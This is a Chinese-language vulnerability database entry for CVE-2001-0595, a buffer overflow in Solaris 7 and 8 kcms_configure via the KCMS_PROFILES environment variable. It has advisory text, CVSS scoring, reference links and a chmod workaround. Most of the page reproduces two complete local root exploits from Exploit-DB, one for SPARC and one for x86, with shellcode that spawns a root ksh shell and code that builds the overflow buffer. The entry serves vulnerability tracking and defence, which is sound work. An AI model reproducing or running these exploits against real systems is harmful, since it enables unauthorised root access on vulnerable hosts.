CVE-2001-0595
CVSS4.6
发布时间 :2001-08-02 00:00:00
修订时间 :2008-09-05 16:24:29
NMCOE    

[原文]Buffer overflow in the kcsSUNWIOsolf.so library in Solaris 7 and 8 allows local attackers to execute arbitrary commands via the KCMS_PROFILES environment variable, e.g. as demonstrated using the kcms_configure program.


[CNNVD]Solaris kcms_configure 缓冲区溢出漏洞(CNNVD-200108-018)

        CVE(CAN) ID: CVE-2001-0595
        
        
        
        Solaris所带的配置工具 "kcms_configure" 易于遭受缓冲区溢出攻击,攻击
        
        者可以获取root权限。
        
        
        
        kcms_configure使用到环境变量KCMS_PROFILES,而动态链接库kcsSUNWIOsolf.so提
        
        供了对环境变量KCMS_PROFILES的解析功能。如果该环境变量的值超长,运行
        
        kcms_configure时就会发生缓冲区溢出,因为kcms_configure是setuid-to-root的,
        
        本地攻击者将获取root权限。
        
        
        
        <* 来源:LSD (contact@lsd-pl.net) *>
        
        
        
        
        
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0595
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0595
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-018
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6365.php
(VENDOR_ADVISORY)  XF  solaris-kcssunwiosolf-bo(6365)
http://www.securityfocus.com/bid/2605
(UNKNOWN)  BID  2605
http://archives.neohapsis.com/archives/bugtraq/2001-04/0203.html
(VENDOR_ADVISORY)  BUGTRAQ  20010411 [LSD] Solaris kcsSUNWIOsolf.so and dtsession vulnerabilities

- 漏洞信息

Solaris kcms_configure 缓冲区溢出漏洞
中危 边界条件错误
2001-08-02 00:00:00 2006-11-14 00:00:00
本地  
        CVE(CAN) ID: CVE-2001-0595
        
        
        
        Solaris所带的配置工具 "kcms_configure" 易于遭受缓冲区溢出攻击,攻击
        
        者可以获取root权限。
        
        
        
        kcms_configure使用到环境变量KCMS_PROFILES,而动态链接库kcsSUNWIOsolf.so提
        
        供了对环境变量KCMS_PROFILES的解析功能。如果该环境变量的值超长,运行
        
        kcms_configure时就会发生缓冲区溢出,因为kcms_configure是setuid-to-root的,
        
        本地攻击者将获取root权限。
        
        
        
        <* 来源:LSD (contact@lsd-pl.net) *>
        
        
        
        
        
        

- 公告与补丁

        
        
        临时解决方法:
        
        
        
         CNNVD建议您在Sun提供官方补丁之前
        
         chmod a-s /usr/openwin/bin/kcms_configure
        
        
        
        厂商补丁:
        
        
        
         暂无
        

- 漏洞信息 (20767)

Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (1) (EDBID:20767)
solaris local
1999-12-01 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/2605/info

The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker.

The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root.

Exploits are available against Solaris x86 and Solaris Sparc.

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 940
#define ADRNUM 32
#define PCHNUM 204

char setuidcode[]=
    "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */
;

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh"
;

char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){
    char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=buffer;
    envp[1]=display;
    envp[2]=0;

    b=buffer;
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}

		

- 漏洞信息 (20768)

Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (2) (EDBID:20768)
solaris local
1999-12-01 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/2605/info
 
The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker.
 
The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root.
 
Exploits are available against Solaris x86 and Solaris Sparc.

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 16000
#define ADRNUM 2900

char setuidshellcode[]=
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x08"             /* jmp     <setuidshellcode+12>   */
    "\x5f"                 /* popl    %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x47\x01"         /* movb    %al,0x1(%edi)          */
    "\xeb\x0d"             /* jmp     <setuidshellcode+25>   */
    "\xe8\xf3\xff\xff\xff" /* call    <setuidshellcode+4>    */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xe8\xee\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xeb\x16"             /* jmp     <setuidshellcode+59>   */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
    "\x52"                 /* pushl   %edx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x7(%edx)          */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xe8\xd6\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xe8\xe5\xff\xff\xff" /* call    <setuidshellcode+37>   */
    "/bin/ksh"
;

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

main(int argc,char **argv){
    char buffer[20000],*b,adr[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=&buffer[0];
    envp[1]=&buffer[17000];
    envp[2]=display;
    envp[3]=0;

    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
    *b=0;

    b=&buffer[17000];
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}

		

- 漏洞信息

1791
Solaris kcsSUNWIOsolf.so Library KCMS_PROFILES Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-04-11 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站